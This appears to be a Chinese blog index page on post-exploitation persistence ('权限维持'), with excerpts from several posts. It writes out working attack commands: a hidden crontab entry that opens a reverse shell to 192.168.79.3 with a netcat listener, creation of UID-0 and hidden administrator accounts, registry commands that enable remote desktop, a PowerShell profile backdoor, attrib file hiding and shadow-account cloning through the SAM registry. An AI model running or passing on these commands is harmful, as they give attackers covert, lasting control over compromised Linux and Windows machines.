权限维持
s1y1n9aI
未知攻 焉知防
展开
-
隐藏计划任务反弹shell
靶机执行(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.79.3/2334 0>&1';\r%100c\n")|crontab -vps监听nc -lvvp 2334 该计划任务是隐藏的,使用contab -e,选择一种编辑器后可以查看到内容...原创 2021-12-22 22:28:37 · 2197 阅读 · 0 评论 -
创建具有root权限的账户
第一种# guest:123456useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test第二种# t0mcat:123456perl -le 'print crypt("123456","salt")' # 密码:123456echo "t0mcat:sahL5d5V.UWtI:0:0:/root:/bin/bash" >&原创 2021-12-21 22:51:19 · 571 阅读 · 0 评论 -
组策略脚本维持
在gpedit.msc上打开组策略,在Windows设置选项上有个脚本(启动/关机)选项 脚本参数可为空# shell.bat 放在开机自启动目录net user hack$ 123456 /add && net localgroup administrators hack$ /add原创 2021-12-19 22:39:14 · 2107 阅读 · 0 评论 -
远程终端问题集锦
1.描述 远程终端的默认端口是3389,云vps一般会开启,没有启用的情况下,在较高的权限下可以使用注册表命令进行开启。2.注册表开启远程终端命令2.1 2008 2012 2016 开启3389,写入到bat文件中echo DO ALL IN CMD!reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfDenyTSConnections /t REG_DWORD /d 0 /fre原创 2021-12-14 20:59:12 · 2484 阅读 · 0 评论 -
PowerShell配置文件后门
PowerShell 配置文件是在 PowerShell 启动时运行的脚本。 在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。案例echo $profile Test-path $profile # 结果返回false,表示没有该文件New-Item –Path $Profile –Type File –Force # 强制创建一个$string = 'S原创 2021-12-18 23:18:36 · 1179 阅读 · 0 评论 -
Windows隐藏文件
attrib命令隐藏文件夹或文件attrib +s +a +h +r testAttrib +s +a +h +r 1.php恢复隐藏的文件attrib d:\test -h -s /d /sattrib d:\"*" -h -s /d /s原创 2021-12-17 22:21:23 · 90 阅读 · 0 评论 -
创建影子账号
在账号后面加个美元符,可以隐藏账号;但仅仅只是在命令行无法查看到,在用户面板仍然可以看到该账号。解决办法进入注册表HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User编辑需要权限查看Administrator账号对应的文件复制该文件内容(右键全选-》复制)F文件粘贴替换掉需要隐藏账号的内容分别导出这两个文件导出后,删除该账号也可以使用命令行来删除ner user hacker$ /del删除后,双击刚刚导出的两个文件,导入到注册原创 2021-12-15 20:01:00 · 396 阅读 · 0 评论